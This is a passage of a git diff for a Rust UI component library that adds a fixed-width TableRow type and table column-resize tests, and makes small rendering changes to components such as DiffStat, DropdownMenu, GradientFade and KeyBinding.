"*|***|X|**|**|*****", - expected: "*|***|****|*|*|****", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - squashed_right_reset_col4, - columns: 6, - starting: "*|***|**|**|****|*", - snapshot: "*|********|*|*|X|*", - expected: "*|*****|*|*|****|*", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - reset_col6_right, - columns: 6, - starting: "*|***|**|***|***|**", - snapshot: "*|***|**|***|**|XXX", - expected: "*|***|**|***|***|**", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - reset_col6_left, - columns: 6, 
- starting: "*|***|**|***|***|**", - snapshot: "*|***|**|***|****|X", - expected: "*|***|**|***|***|**", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - last_column_grow_cascading, - columns: 6, - starting: "*|***|**|**|**|***", - snapshot: "*|*******|*|**|*|X", - expected: "*|******|*|*|*|***", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - goes_left_when_left_has_extreme_diff, - columns: 6, - starting: "*|***|****|**|**|***", - snapshot: "*|********|X|*|**|**", - expected: "*|*****|****|*|**|**", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - basic_shrink_right, - columns: 6, - starting: "**|**|**|**|**|**", - snapshot: "**|**|XXX|*|**|**", - expected: "**|**|**|**|**|**", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - shrink_should_go_left, - columns: 6, - starting: "*|***|**|*|*|*", - snapshot: "*|*|XXX|**|*|*", - expected: "*|**|**|**|*|*", - minimums: "X|*|*|*|*|*", - ); - - check_reset_size!( - shrink_should_go_right, - columns: 6, - starting: "*|***|**|**|**|*", - snapshot: "*|****|XXX|*|*|*", - expected: "*|****|**|**|*|*", - minimums: "X|*|*|*|*|*", - ); - } - - mod drag_handle { - use super::*; - - fn parse(input: &str) -> (Vec, f32, Option) { - let mut widths = Vec::new(); - let column_index = input.replace("*", "").find("I"); - for col in input.replace("I", "|").split('|') { - widths.push(col.len() as f32); - } - - for w in &widths { - assert!(w.is_finite(), "incorrect number of columns"); - } - let total = widths.iter().sum::(); - for width in &mut widths { - *width /= total; - } - (widths, total, column_index) - } - - #[track_caller] - fn check(distance: i32, widths: &str, expected: &str, resize_behavior: &str) { - let (widths, total_1, Some(column_index)) = parse(widths) else { - panic!("invalid test input: widths should be marked"); - }; - let (expected, total_2, None) = parse(expected) else { - panic!("invalid test input: expected should not be marked: {expected:?}"); - }; - assert_eq!( - total_1, total_2, - 
"invalid test input: total width not the same" - ); - let cols = widths.len(); - let resize_behavior_vec = parse_resize_behavior(resize_behavior, total_1, cols); - let resize_behavior = TableRow::from_vec(resize_behavior_vec, cols); - - let distance = distance as f32 / total_1; - - let mut widths_table_row = TableRow::from_vec(widths, cols); - TableColumnWidths::drag_column_handle( - distance, - column_index, - &mut widths_table_row, - &resize_behavior, - ); - - let result_widths = widths_table_row.as_slice(); - let is_eq = is_almost_eq(result_widths, &expected); - if !is_eq { - let result_str = cols_to_str(result_widths, total_1); - let expected_str = cols_to_str(&expected, total_1); - panic!( - "resize failed\ncomputed: {result_str}\nexpected: {expected_str}\n\ncomputed values: {result_widths:?}\nexpected values: {expected:?}\n:minimum widths: {resize_behavior:?}" - ); - } - } - - macro_rules! check { - (columns: $cols:expr, distance: $dist:expr, snapshot: $current:expr, expected: $expected:expr, resizing: $resizing:expr $(,)?) => { - check($dist, $current, $expected, $resizing); - }; - ($name:ident, columns: $cols:expr, distance: $dist:expr, snapshot: $current:expr, expected: $expected:expr, minimums: $resizing:expr $(,)?) 
=> { - #[test] - fn $name() { - check($dist, $current, $expected, $resizing); - } - }; - } - - check!( - basic_right_drag, - columns: 3, - distance: 1, - snapshot: "**|**I**", - expected: "**|***|*", - minimums: "X|*|*", - ); - - check!( - drag_left_against_mins, - columns: 5, - distance: -1, - snapshot: "*|*|*|*I*******", - expected: "*|*|*|*|*******", - minimums: "X|*|*|*|*", - ); - - check!( - drag_left, - columns: 5, - distance: -2, - snapshot: "*|*|*|*****I***", - expected: "*|*|*|***|*****", - minimums: "X|*|*|*|*", - ); - } -} diff --git a/crates/ui/src/components/data_table/table_row.rs b/crates/ui/src/components/data_table/table_row.rs new file mode 100644 index 0000000000000000000000000000000000000000..9ef75e4cbbb72755294ae5c34724a55fbc40f8b8 --- /dev/null +++ b/crates/ui/src/components/data_table/table_row.rs @@ -0,0 +1,208 @@ +//! A newtype for a table row that enforces a fixed column count at runtime. +//! +//! This type ensures that all rows in a table have the same width, preventing accidental creation or mutation of rows with inconsistent lengths. +//! It is especially useful for CSV or tabular data where rectangular invariants must be maintained, but the number of columns is only known at runtime. +//! By using `TableRow`, we gain stronger guarantees and safer APIs compared to a bare `Vec`, without requiring const generics. + +use std::{ + any::type_name, + ops::{ + Index, IndexMut, Range, RangeFrom, RangeFull, RangeInclusive, RangeTo, RangeToInclusive, + }, +}; + +#[derive(Clone, Debug, PartialEq, Eq)] +pub struct TableRow(Vec); + +impl TableRow { + pub fn from_element(element: T, length: usize) -> Self + where + T: Clone, + { + Self::from_vec(vec![element; length], length) + } + + /// Constructs a `TableRow` from a `Vec`, panicking if the length does not match `expected_length`. + /// + /// Use this when you want to ensure at construction time that the row has the correct number of columns. 
+ /// This enforces the rectangular invariant for table data, preventing accidental creation of malformed rows. + /// + /// # Panics + /// Panics if `data.len() != expected_length`. + pub fn from_vec(data: Vec, expected_length: usize) -> Self { + Self::try_from_vec(data, expected_length).unwrap_or_else(|e| { + let name = type_name::>(); + panic!("Expected {name} to be created successfully: {e}"); + }) + } + + /// Attempts to construct a `TableRow` from a `Vec`, returning an error if the length does not match `expected_len`. + /// + /// This is a fallible alternative to `from_vec`, allowing you to handle inconsistent row lengths gracefully. + /// Returns `Ok(TableRow)` if the length matches, or an `Err` with a descriptive message otherwise. + pub fn try_from_vec(data: Vec, expected_len: usize) -> Result { + if data.len() != expected_len { + Err(format!( + "Row length {} does not match expected {}", + data.len(), + expected_len + )) + } else { + Ok(Self(data)) + } + } + + /// Returns reference to element by column index. + /// + /// # Panics + /// Panics if `col` is out of bounds (i.e., `col >= self.cols()`). + pub fn expect_get(&self, col: impl Into) -> &T { + let col = col.into(); + self.0.get(col).unwrap_or_else(|| { + panic!( + "Expected table row of `{}` to have {col:?}", + type_name::() + ) + }) + } + + pub fn get(&self, col: impl Into) -> Option<&T> { + self.0.get(col.into()) + } + + pub fn as_slice(&self) -> &[T] { + &self.0 + } + + pub fn into_vec(self) -> Vec { + self.0 + } + + /// Like [`map`], but borrows the row and clones each element before mapping. + /// + /// This is useful when you want to map over a borrowed row without consuming it, + /// but your mapping function requires ownership of each element. + /// + /// # Difference + /// - `map_cloned` takes `&self`, clones each element, and applies `f(T) -> U`. + /// - [`map`] takes `self` by value and applies `f(T) -> U` directly, consuming the row. 
+ /// - [`map_ref`] takes `&self` and applies `f(&T) -> U` to references of each element. + pub fn map_cloned(&self, f: F) -> TableRow + where + F: FnMut(T) -> U, + T: Clone, + { + self.clone().map(f) + } + + /// Consumes the row and transforms all elements within it in a length-safe way. + /// + /// # Difference + /// - `map` takes ownership of the row (`self`) and applies `f(T) -> U` to each element. + /// - Use this when you want to transform and consume the row in one step. + /// - See also [`map_cloned`] (for mapping over a borrowed row with cloning) and [`map_ref`] (for mapping over references). + pub fn map(self, f: F) -> TableRow + where + F: FnMut(T) -> U, + { + TableRow(self.0.into_iter().map(f).collect()) + } + + /// Borrows the row and transforms all elements by reference in a length-safe way. + /// + /// # Difference + /// - `map_ref` takes `&self` and applies `f(&T) -> U` to each element by reference. + /// - Use this when you want to map over a borrowed row without cloning or consuming it. + /// - See also [`map`] (for consuming the row) and [`map_cloned`] (for mapping with cloning). 
+ pub fn map_ref(&self, f: F) -> TableRow + where + F: FnMut(&T) -> U, + { + TableRow(self.0.iter().map(f).collect()) + } + + /// Number of columns (alias to `len()` with more semantic meaning) + pub fn cols(&self) -> usize { + self.0.len() + } +} + +///// Convenience traits ///// +pub trait IntoTableRow { + fn into_table_row(self, expected_length: usize) -> TableRow; +} +impl IntoTableRow for Vec { + fn into_table_row(self, expected_length: usize) -> TableRow { + TableRow::from_vec(self, expected_length) + } +} + +// Index implementations for convenient access +impl Index for TableRow { + type Output = T; + + fn index(&self, index: usize) -> &Self::Output { + &self.0[index] + } +} + +impl IndexMut for TableRow { + fn index_mut(&mut self, index: usize) -> &mut Self::Output { + &mut self.0[index] + } +} + +// Range indexing implementations for slice operations +impl Index> for TableRow { + type Output = [T]; + + fn index(&self, index: Range) -> &Self::Output { + as Index>>::index(&self.0, index) + } +} + +impl Index> for TableRow { + type Output = [T]; + + fn index(&self, index: RangeFrom) -> &Self::Output { + as Index>>::index(&self.0, index) + } +} + +impl Index> for TableRow { + type Output = [T]; + + fn index(&self, index: RangeTo) -> &Self::Output { + as Index>>::index(&self.0, index) + } +} + +impl Index> for TableRow { + type Output = [T]; + + fn index(&self, index: RangeToInclusive) -> &Self::Output { + as Index>>::index(&self.0, index) + } +} + +impl Index for TableRow { + type Output = [T]; + + fn index(&self, index: RangeFull) -> &Self::Output { + as Index>::index(&self.0, index) + } +} + +impl Index> for TableRow { + type Output = [T]; + + fn index(&self, index: RangeInclusive) -> &Self::Output { + as Index>>::index(&self.0, index) + } +} + +impl IndexMut> for TableRow { + fn index_mut(&mut self, index: RangeInclusive) -> &mut Self::Output { + as IndexMut>>::index_mut(&mut self.0, index) + } +} diff --git a/crates/ui/src/components/data_table/tests.rs 
b/crates/ui/src/components/data_table/tests.rs new file mode 100644 index 0000000000000000000000000000000000000000..604e8b7cd1aabee85b406ec99d458c949eda599b --- /dev/null +++ b/crates/ui/src/components/data_table/tests.rs @@ -0,0 +1,319 @@ +use super::table_row::TableRow; +use crate::{RedistributableColumnsState, TableResizeBehavior}; + +fn is_almost_eq(a: &[f32], b: &[f32]) -> bool { + a.len() == b.len() && a.iter().zip(b).all(|(x, y)| (x - y).abs() < 1e-6) +} + +fn cols_to_str(cols: &[f32], total_size: f32) -> String { + cols.iter() + .map(|f| "*".repeat(f32::round(f * total_size) as usize)) + .collect::>() + .join("|") +} + +fn parse_resize_behavior( + input: &str, + total_size: f32, + expected_cols: usize, +) -> Vec { + let mut resize_behavior = Vec::with_capacity(expected_cols); + for col in input.split('|') { + if col.starts_with('X') || col.is_empty() { + resize_behavior.push(TableResizeBehavior::None); + } else if col.starts_with('*') { + resize_behavior.push(TableResizeBehavior::MinSize(col.len() as f32 / total_size)); + } else { + panic!("invalid test input: unrecognized resize behavior: {}", col); + } + } + + if resize_behavior.len() != expected_cols { + panic!( + "invalid test input: expected {} columns, got {}", + expected_cols, + resize_behavior.len() + ); + } + resize_behavior +} + +mod reset_column_size { + use super::*; + + fn parse(input: &str) -> (Vec, f32, Option) { + let mut widths = Vec::new(); + let mut column_index = None; + for (index, col) in input.split('|').enumerate() { + widths.push(col.len() as f32); + if col.starts_with('X') { + column_index = Some(index); + } + } + + for w in &widths { + assert!(w.is_finite(), "incorrect number of columns"); + } + let total = widths.iter().sum::(); + for width in &mut widths { + *width /= total; + } + (widths, total, column_index) + } + + #[track_caller] + fn check_reset_size(initial_sizes: &str, widths: &str, expected: &str, resize_behavior: &str) { + let (initial_sizes, total_1, None) = 
parse(initial_sizes) else { + panic!("invalid test input: initial sizes should not be marked"); + }; + let (widths, total_2, Some(column_index)) = parse(widths) else { + panic!("invalid test input: widths should be marked"); + }; + assert_eq!( + total_1, total_2, + "invalid test input: total width not the same {total_1}, {total_2}" + ); + let (expected, total_3, None) = parse(expected) else { + panic!("invalid test input: expected should not be marked: {expected:?}"); + }; + assert_eq!( + total_2, total_3, + "invalid test input: total width not the same" + ); + let cols = initial_sizes.len(); + let resize_behavior_vec = parse_resize_behavior(resize_behavior, total_1, cols); + let resize_behavior = TableRow::from_vec(resize_behavior_vec, cols); + let result = RedistributableColumnsState::reset_to_initial_size( + column_index, + TableRow::from_vec(widths, cols), + TableRow::from_vec(initial_sizes, cols), + &resize_behavior, + ); + let result_slice = result.as_slice(); + let is_eq = is_almost_eq(result_slice, &expected); + if !is_eq { + let result_str = cols_to_str(result_slice, total_1); + let expected_str = cols_to_str(&expected, total_1); + panic!( + "resize failed\ncomputed: {result_str}\nexpected: {expected_str}\n\ncomputed values: {result_slice:?}\nexpected values: {expected:?}\n:minimum widths: {resize_behavior:?}" + ); + } + } + + macro_rules! check_reset_size { + (columns: $cols:expr, starting: $initial:expr, snapshot: $current:expr, expected: $expected:expr, resizing: $resizing:expr $(,)?) => { + check_reset_size($initial, $current, $expected, $resizing); + }; + ($name:ident, columns: $cols:expr, starting: $initial:expr, snapshot: $current:expr, expected: $expected:expr, minimums: $resizing:expr $(,)?) 
=> { + #[test] + fn $name() { + check_reset_size($initial, $current, $expected, $resizing); + } + }; + } + + check_reset_size!( + basic_right, + columns: 5, + starting: "**|**|**|**|**", + snapshot: "**|**|X|***|**", + expected: "**|**|**|**|**", + minimums: "X|*|*|*|*", + ); + + check_reset_size!( + basic_left, + columns: 5, + starting: "**|**|**|**|**", + snapshot: "**|**|***|X|**", + expected: "**|**|**|**|**", + minimums: "X|*|*|*|**", + ); + + check_reset_size!( + squashed_left_reset_col2, + columns: 6, + starting: "*|***|**|**|****|*", + snapshot: "*|*|X|*|*|********", + expected: "*|*|**|*|*|*******", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + grow_cascading_right, + columns: 6, + starting: "*|***|****|**|***|*", + snapshot: "*|***|X|**|**|*****", + expected: "*|***|****|*|*|****", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + squashed_right_reset_col4, + columns: 6, + starting: "*|***|**|**|****|*", + snapshot: "*|********|*|*|X|*", + expected: "*|*****|*|*|****|*", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + reset_col6_right, + columns: 6, + starting: "*|***|**|***|***|**", + snapshot: "*|***|**|***|**|XXX", + expected: "*|***|**|***|***|**", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + reset_col6_left, + columns: 6, + starting: "*|***|**|***|***|**", + snapshot: "*|***|**|***|****|X", + expected: "*|***|**|***|***|**", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + last_column_grow_cascading, + columns: 6, + starting: "*|***|**|**|**|***", + snapshot: "*|*******|*|**|*|X", + expected: "*|******|*|*|*|***", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + goes_left_when_left_has_extreme_diff, + columns: 6, + starting: "*|***|****|**|**|***", + snapshot: "*|********|X|*|**|**", + expected: "*|*****|****|*|**|**", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + basic_shrink_right, + columns: 6, + starting: "**|**|**|**|**|**", + snapshot: "**|**|XXX|*|**|**", + expected: 
"**|**|**|**|**|**", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + shrink_should_go_left, + columns: 6, + starting: "*|***|**|*|*|*", + snapshot: "*|*|XXX|**|*|*", + expected: "*|**|**|**|*|*", + minimums: "X|*|*|*|*|*", + ); + + check_reset_size!( + shrink_should_go_right, + columns: 6, + starting: "*|***|**|**|**|*", + snapshot: "*|****|XXX|*|*|*", + expected: "*|****|**|**|*|*", + minimums: "X|*|*|*|*|*", + ); +} + +mod drag_handle { + use super::*; + + fn parse(input: &str) -> (Vec, f32, Option) { + let mut widths = Vec::new(); + let column_index = input.replace("*", "").find("I"); + for col in input.replace("I", "|").split('|') { + widths.push(col.len() as f32); + } + + for w in &widths { + assert!(w.is_finite(), "incorrect number of columns"); + } + let total = widths.iter().sum::(); + for width in &mut widths { + *width /= total; + } + (widths, total, column_index) + } + + #[track_caller] + fn check(distance: i32, widths: &str, expected: &str, resize_behavior: &str) { + let (widths, total_1, Some(column_index)) = parse(widths) else { + panic!("invalid test input: widths should be marked"); + }; + let (expected, total_2, None) = parse(expected) else { + panic!("invalid test input: expected should not be marked: {expected:?}"); + }; + assert_eq!( + total_1, total_2, + "invalid test input: total width not the same" + ); + let cols = widths.len(); + let resize_behavior_vec = parse_resize_behavior(resize_behavior, total_1, cols); + let resize_behavior = TableRow::from_vec(resize_behavior_vec, cols); + + let distance = distance as f32 / total_1; + + let mut widths_table_row = TableRow::from_vec(widths, cols); + RedistributableColumnsState::drag_column_handle( + distance, + column_index, + &mut widths_table_row, + &resize_behavior, + ); + + let result_widths = widths_table_row.as_slice(); + let is_eq = is_almost_eq(result_widths, &expected); + if !is_eq { + let result_str = cols_to_str(result_widths, total_1); + let expected_str = cols_to_str(&expected, 
total_1); + panic!( + "resize failed\ncomputed: {result_str}\nexpected: {expected_str}\n\ncomputed values: {result_widths:?}\nexpected values: {expected:?}\n:minimum widths: {resize_behavior:?}" + ); + } + } + + macro_rules! check { + (columns: $cols:expr, distance: $dist:expr, snapshot: $current:expr, expected: $expected:expr, resizing: $resizing:expr $(,)?) => { + check($dist, $current, $expected, $resizing); + }; + ($name:ident, columns: $cols:expr, distance: $dist:expr, snapshot: $current:expr, expected: $expected:expr, minimums: $resizing:expr $(,)?) => { + #[test] + fn $name() { + check($dist, $current, $expected, $resizing); + } + }; + } + + check!( + basic_right_drag, + columns: 3, + distance: 1, + snapshot: "**|**I**", + expected: "**|***|*", + minimums: "X|*|*", + ); + + check!( + drag_left_against_mins, + columns: 5, + distance: -1, + snapshot: "*|*|*|*I*******", + expected: "*|*|*|*|*******", + minimums: "X|*|*|*|*", + ); + + check!( + drag_left, + columns: 5, + distance: -2, + snapshot: "*|*|*|*****I***", + expected: "*|*|*|***|*****", + minimums: "X|*|*|*|*", + ); +} diff --git a/crates/ui/src/components/diff_stat.rs b/crates/ui/src/components/diff_stat.rs index ec6d515f1b4f847631fc65fae4ed3ccd3185d271..c2e76b171e7e28cc5cb2e2b0c4d776b5bc7e2bfc 100644 --- a/crates/ui/src/components/diff_stat.rs +++ b/crates/ui/src/components/diff_stat.rs @@ -1,3 +1,4 @@ +use crate::Tooltip; use crate::prelude::*; #[derive(IntoElement, RegisterComponent)] @@ -6,6 +7,7 @@ pub struct DiffStat { added: usize, removed: usize, label_size: LabelSize, + tooltip: Option, } impl DiffStat { @@ -15,6 +17,7 @@ impl DiffStat { added, removed, label_size: LabelSize::Small, + tooltip: None, } } @@ -22,41 +25,32 @@ impl DiffStat { self.label_size = label_size; self } + + pub fn tooltip(mut self, tooltip: impl Into) -> Self { + self.tooltip = Some(tooltip.into()); + self + } } impl RenderOnce for DiffStat { fn render(self, _: &mut Window, _cx: &mut App) -> impl IntoElement { + let 
tooltip = self.tooltip; h_flex() .id(self.id) .gap_1() .child( - h_flex() - .gap_0p5() - .child( - Icon::new(IconName::Plus) - .size(IconSize::XSmall) - .color(Color::Success), - ) - .child( - Label::new(self.added.to_string()) - .color(Color::Success) - .size(self.label_size), - ), + Label::new(format!("+\u{2009}{}", self.added)) + .color(Color::Success) + .size(self.label_size), ) .child( - h_flex() - .gap_0p5() - .child( - Icon::new(IconName::Dash) - .size(IconSize::XSmall) - .color(Color::Error), - ) - .child( - Label::new(self.removed.to_string()) - .color(Color::Error) - .size(self.label_size), - ), + Label::new(format!("\u{2012}\u{2009}{}", self.removed)) + .color(Color::Error) + .size(self.label_size), ) + .when_some(tooltip, |this, tooltip| { + this.tooltip(Tooltip::text(tooltip)) + }) } } diff --git a/crates/ui/src/components/disclosure.rs b/crates/ui/src/components/disclosure.rs index 84282db2e332dc5d39cde2b3aae8d8d181a1024c..320751890dab3a61d2a3ccfaa7917204b5d32c76 100644 --- a/crates/ui/src/components/disclosure.rs +++ b/crates/ui/src/components/disclosure.rs @@ -2,7 +2,7 @@ use std::sync::Arc; use gpui::{ClickEvent, CursorStyle, SharedString}; -use crate::{Color, IconButton, IconButtonShape, IconName, IconSize, prelude::*}; +use crate::prelude::*; #[derive(IntoElement, RegisterComponent)] pub struct Disclosure { @@ -91,7 +91,6 @@ impl RenderOnce for Disclosure { false => self.closed_icon, }, ) - .shape(IconButtonShape::Square) .icon_color(Color::Muted) .icon_size(IconSize::Small) .disabled(self.disabled) diff --git a/crates/ui/src/components/dropdown_menu.rs b/crates/ui/src/components/dropdown_menu.rs index 7a1d3c7dfd77306b2d7b3b6786dae04d6eaee6b2..961608461c04971cda81cfdd64d9eb62577f07ed 100644 --- a/crates/ui/src/components/dropdown_menu.rs +++ b/crates/ui/src/components/dropdown_menu.rs @@ -163,11 +163,10 @@ impl RenderOnce for DropdownMenu { Some( Button::new(self.id.clone(), text) .style(button_style) - .when(self.chevron, |this| { - 
this.icon(self.trigger_icon) - .icon_position(IconPosition::End) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .when_some(self.trigger_icon.filter(|_| self.chevron), |this, icon| { + this.end_icon( + Icon::new(icon).size(IconSize::XSmall).color(Color::Muted), + ) }) .when(full_width, |this| this.full_width()) .size(trigger_size) diff --git a/crates/ui/src/components/gradient_fade.rs b/crates/ui/src/components/gradient_fade.rs new file mode 100644 index 0000000000000000000000000000000000000000..8a982695ecea7cef9abcf9de2db7ba550971eb8a --- /dev/null +++ b/crates/ui/src/components/gradient_fade.rs @@ -0,0 +1,92 @@ +use gpui::{Hsla, Pixels, SharedString, linear_color_stop, linear_gradient, px}; + +use crate::prelude::*; + +/// A gradient overlay that fades from a solid color to transparent. +#[derive(IntoElement)] +pub struct GradientFade { + base_bg: Hsla, + hover_bg: Hsla, + active_bg: Hsla, + width: Pixels, + right: Pixels, + gradient_stop: f32, + group_name: Option, +} + +impl GradientFade { + pub fn new(base_bg: Hsla, hover_bg: Hsla, active_bg: Hsla) -> Self { + Self { + base_bg, + hover_bg, + active_bg, + width: px(48.0), + right: px(0.0), + gradient_stop: 0.6, + group_name: None, + } + } + + pub fn width(mut self, width: Pixels) -> Self { + self.width = width; + self + } + + pub fn right(mut self, right: Pixels) -> Self { + self.right = right; + self + } + + pub fn gradient_stop(mut self, stop: f32) -> Self { + self.gradient_stop = stop; + self + } + + pub fn group_name(mut self, name: impl Into) -> Self { + self.group_name = Some(name.into()); + self + } +} + +impl RenderOnce for GradientFade { + fn render(self, _window: &mut Window, cx: &mut App) -> impl IntoElement { + let stop = self.gradient_stop; + + // Best-effort to flatten potentially-transparent colors to opaque ones. 
+ let app_bg = cx.theme().colors().background; + let base_bg = app_bg.blend(self.base_bg); + let hover_bg = app_bg.blend(self.hover_bg); + let active_bg = app_bg.blend(self.active_bg); + + div() + .id("gradient_fade") + .absolute() + .top_0() + .right(self.right) + .w(self.width) + .h_full() + .bg(linear_gradient( + 90., + linear_color_stop(base_bg, stop), + linear_color_stop(base_bg.opacity(0.0), 0.), + )) + .when_some(self.group_name.clone(), |element, group_name| { + element.group_hover(group_name, move |s| { + s.bg(linear_gradient( + 90., + linear_color_stop(hover_bg, stop), + linear_color_stop(hover_bg.opacity(0.0), 0.), + )) + }) + }) + .when_some(self.group_name, |element, group_name| { + element.group_active(group_name, move |s| { + s.bg(linear_gradient( + 90., + linear_color_stop(active_bg, stop), + linear_color_stop(active_bg.opacity(0.0), 0.), + )) + }) + }) + } +} diff --git a/crates/ui/src/components/icon/icon_decoration.rs b/crates/ui/src/components/icon/icon_decoration.rs index 9f84a8bcf4eb10672161ed2733d7ed5baa95f899..423f6d73a68e8ee3aea550129e2a6220a8a699a6 100644 --- a/crates/ui/src/components/icon/icon_decoration.rs +++ b/crates/ui/src/components/icon/icon_decoration.rs @@ -63,6 +63,7 @@ pub struct IconDecoration { color: Hsla, knockout_color: Hsla, knockout_hover_color: Hsla, + size: Pixels, position: Point, group_name: Option, } @@ -78,6 +79,7 @@ impl IconDecoration { color, knockout_color, knockout_hover_color: knockout_color, + size: ICON_DECORATION_SIZE, position, group_name: None, } @@ -116,6 +118,12 @@ impl IconDecoration { self } + /// Sets the size of the decoration. 
+ pub fn size(mut self, size: Pixels) -> Self { + self.size = size; + self + } + /// Sets the name of the group the decoration belongs to pub fn group_name(mut self, name: Option) -> Self { self.group_name = name; @@ -125,11 +133,13 @@ impl IconDecoration { impl RenderOnce for IconDecoration { fn render(self, _window: &mut Window, _cx: &mut App) -> impl IntoElement { + let size = self.size; + let foreground = svg() .absolute() .bottom_0() .right_0() - .size(ICON_DECORATION_SIZE) + .size(size) .path(self.kind.fg().path()) .text_color(self.color); @@ -137,7 +147,7 @@ impl RenderOnce for IconDecoration { .absolute() .bottom_0() .right_0() - .size(ICON_DECORATION_SIZE) + .size(size) .path(self.kind.bg().path()) .text_color(self.knockout_color) .map(|this| match self.group_name { @@ -148,7 +158,7 @@ impl RenderOnce for IconDecoration { }); div() - .size(ICON_DECORATION_SIZE) + .size(size) .flex_none() .absolute() .bottom(self.position.y) diff --git a/crates/ui/src/components/keybinding.rs b/crates/ui/src/components/keybinding.rs index e22669995db416a3ec6884a79860e76610dd7d03..016181ee9bd22aba1dd937220df03212aa390153 100644 --- a/crates/ui/src/components/keybinding.rs +++ b/crates/ui/src/components/keybinding.rs @@ -1,13 +1,13 @@ use std::rc::Rc; use crate::PlatformStyle; +use crate::utils::capitalize; use crate::{Icon, IconName, IconSize, h_flex, prelude::*}; use gpui::{ Action, AnyElement, App, FocusHandle, Global, IntoElement, KeybindingKeystroke, Keystroke, Modifiers, Window, relative, }; use itertools::Itertools; -use settings::KeybindSource; #[derive(Debug)] enum Source { @@ -102,11 +102,11 @@ impl KeyBinding { } } - pub fn from_keystrokes(keystrokes: Rc<[KeybindingKeystroke]>, source: KeybindSource) -> Self { + pub fn from_keystrokes(keystrokes: Rc<[KeybindingKeystroke]>, vim_mode: bool) -> Self { Self { source: Source::Keystrokes { keystrokes }, size: None, - vim_mode: source == KeybindSource::Vim, + vim_mode, platform_style: PlatformStyle::platform(), disabled: 
false, } @@ -142,7 +142,7 @@ fn render_key( match key_icon { Some(icon) => KeyIcon::new(icon, color).size(size).into_any_element(), None => { - let key = util::capitalize(key); + let key = capitalize(key); Key::new(&key, color).size(size).into_any_element() } } @@ -546,7 +546,7 @@ fn keystroke_text( let key = match key { "pageup" => "PageUp", "pagedown" => "PageDown", - key => &util::capitalize(key), + key => &capitalize(key), }; text.push_str(key); } diff --git a/crates/ui/src/components/keybinding_hint.rs b/crates/ui/src/components/keybinding_hint.rs index 7c19953ca43c907070829f7140f97a4fde495b57..9da470c4ee417321c61d1834c1256dd41316aedf 100644 --- a/crates/ui/src/components/keybinding_hint.rs +++ b/crates/ui/src/components/keybinding_hint.rs @@ -14,11 +14,10 @@ use theme::Appearance; /// use gpui::{App, Hsla, KeybindingKeystroke, Keystroke}; /// use ui::prelude::*; /// use ui::{KeyBinding, KeybindingHint}; -/// use settings::KeybindSource; /// /// # fn example(cx: &App) { /// let hint = KeybindingHint::new( -/// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-s").unwrap())].into(), KeybindSource::Base), +/// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-s").unwrap())].into(), false), /// Hsla::black() /// ) /// .prefix("Save:") @@ -46,11 +45,10 @@ impl KeybindingHint { /// use gpui::{App, Hsla, KeybindingKeystroke, Keystroke}; /// use ui::prelude::*; /// use ui::{KeyBinding, KeybindingHint}; - /// use settings::KeybindSource; /// /// # fn example(cx: &App) { /// let hint = KeybindingHint::new( - /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-c").unwrap())].into(), KeybindSource::Base), + /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-c").unwrap())].into(), false), /// Hsla::black() /// ); /// # } @@ -76,12 +74,11 @@ impl KeybindingHint { /// use gpui::{App, Hsla, 
KeybindingKeystroke, Keystroke}; /// use ui::prelude::*; /// use ui::{KeyBinding, KeybindingHint}; - /// use settings::KeybindSource; /// /// # fn example(cx: &App) { /// let hint = KeybindingHint::with_prefix( /// "Copy:", - /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-c").unwrap())].into(), KeybindSource::Base), + /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-c").unwrap())].into(), false), /// Hsla::black() /// ); /// # } @@ -111,11 +108,10 @@ impl KeybindingHint { /// use gpui::{App, Hsla, KeybindingKeystroke, Keystroke}; /// use ui::prelude::*; /// use ui::{KeyBinding, KeybindingHint}; - /// use settings::KeybindSource; /// /// # fn example(cx: &App) { /// let hint = KeybindingHint::with_suffix( - /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-v").unwrap())].into(), KeybindSource::Base), + /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-v").unwrap())].into(), false), /// "Paste", /// Hsla::black() /// ); @@ -145,11 +141,10 @@ impl KeybindingHint { /// use gpui::{App, Hsla, KeybindingKeystroke, Keystroke}; /// use ui::prelude::*; /// use ui::{KeyBinding, KeybindingHint}; - /// use settings::KeybindSource; /// /// # fn example(cx: &App) { /// let hint = KeybindingHint::new( - /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-x").unwrap())].into(), KeybindSource::Base), + /// KeyBinding::from_keystrokes(vec![KeybindingKeystroke::from_keystroke(Keystroke::parse("ctrl-x").unwrap())].into(), false), /// Hsla::black() /// ) /// .prefix("Cut:"); @@ -170,11 +165,10 @@ impl KeybindingHint { /// use gpui::{App, Hsla, KeybindingKeystroke, Keystroke}; /// use ui::prelude::*; /// use ui::{KeyBinding, KeybindingHint}; - /// use settings::KeybindSource; /// /// # fn example(cx: &App) { /// let hint = KeybindingHint::new( - /// 
